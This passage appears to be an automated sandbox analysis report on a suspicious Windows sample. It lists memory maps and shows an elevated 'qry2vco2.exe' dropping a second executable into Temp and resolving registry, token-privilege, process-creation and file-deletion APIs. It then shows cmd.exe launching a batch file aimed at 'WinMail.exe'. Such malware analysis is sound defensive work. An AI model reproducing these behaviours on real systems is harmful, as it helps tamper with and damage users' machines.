| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f700000 | 0x7f700000 | 0x7f7fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f800000 | 0x7f800000 | 0x7f822fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f827000 | 0x7f827000 | 0x7f827fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f829000 | 0x7f829000 | 0x7f829fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f82a000 | 0x7f82a000 | 0x7f82cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f82d000 | 0x7f82d000 | 0x7f82ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #166: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #166 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "jnwmon.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:05, Reason: Child Process |
| Unmonitor | End Time: 00:03:10, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf94 |
| Parent PID | 0x95c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C94
0x
578
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x00927fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ac0000 | 0x00ac0000 | 0x01ebffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x0200ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:39 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #167: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #167 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Mail\WinMail.exe"" |
